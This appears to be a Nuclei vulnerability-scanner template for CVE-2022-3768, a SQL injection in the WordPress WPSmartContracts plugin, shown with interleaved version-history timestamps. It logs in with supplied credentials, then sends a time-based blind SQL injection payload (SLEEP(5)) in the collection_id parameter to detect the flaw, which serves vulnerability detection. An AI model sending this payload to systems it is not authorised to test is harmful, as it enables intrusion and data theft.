2022-12-25 21:55:02 +00:00
id : CVE-2022-3768
info :
2023-01-16 17:41:15 +00:00
name : WordPress WPSmartContracts <1.3.12 - SQL Injection
2022-12-25 21:55:02 +00:00
author : Hardik-Solanki
severity : high
description : |
2023-01-16 17:41:15 +00:00
WordPress WPSmartContracts plugin before 1.3.12 contains a SQL injection vulnerability. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement. An attacker with a role as low as author can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations.
2022-12-25 21:55:02 +00:00
reference :
- https://wpscan.com/vulnerability/1d8bf5bb-5a17-49b7-a5ba-5f2866e1f8a3
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3768
- https://cve.report/CVE-2022-3768
2023-01-16 17:41:15 +00:00
remediation : Fixed in version 1.3.12.
2022-12-25 21:55:02 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score : 8.8
cve-id : CVE-2022-3768
cwe-id : CWE-89
metadata :
verified : "true"
2023-01-05 11:21:19 +00:00
tags : wp-smart-contracts,authenticated,cve,wordpress,wp,sqli,cve2022,wp-plugin,wpscan
2022-12-25 21:55:02 +00:00
requests :
- raw :
- |
2022-12-27 16:10:38 +00:00
POST /wp-login.php HTTP/1.1
2022-12-25 21:55:02 +00:00
Host : {{Hostname}}
2022-12-27 16:10:38 +00:00
Origin : {{RootURL}}
Content-Type : application/x-www-form-urlencoded
Cookie : wordpress_test_cookie=WP%20Cookie%20check
2022-12-25 21:55:02 +00:00
2022-12-27 16:10:38 +00:00
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
2022-12-25 21:55:02 +00:00
2022-12-27 16:10:38 +00:00
- |
GET /wp-admin/edit.php?post_type=nft&page=nft-batch-mint&step=4&collection_id=1+AND+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)&uid=1 HTTP/1.1
Host : {{Hostname}}
2022-12-25 21:55:02 +00:00
2022-12-27 16:10:38 +00:00
cookie-reuse : true
matchers :
- type : dsl
dsl :
- 'duration_2>=5'
- 'status_code_2 == 200'
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "Batch Mint NFTs")'
2022-12-25 21:55:02 +00:00
condition : and
2023-01-16 17:41:15 +00:00
# Enhanced by md on 2023/01/06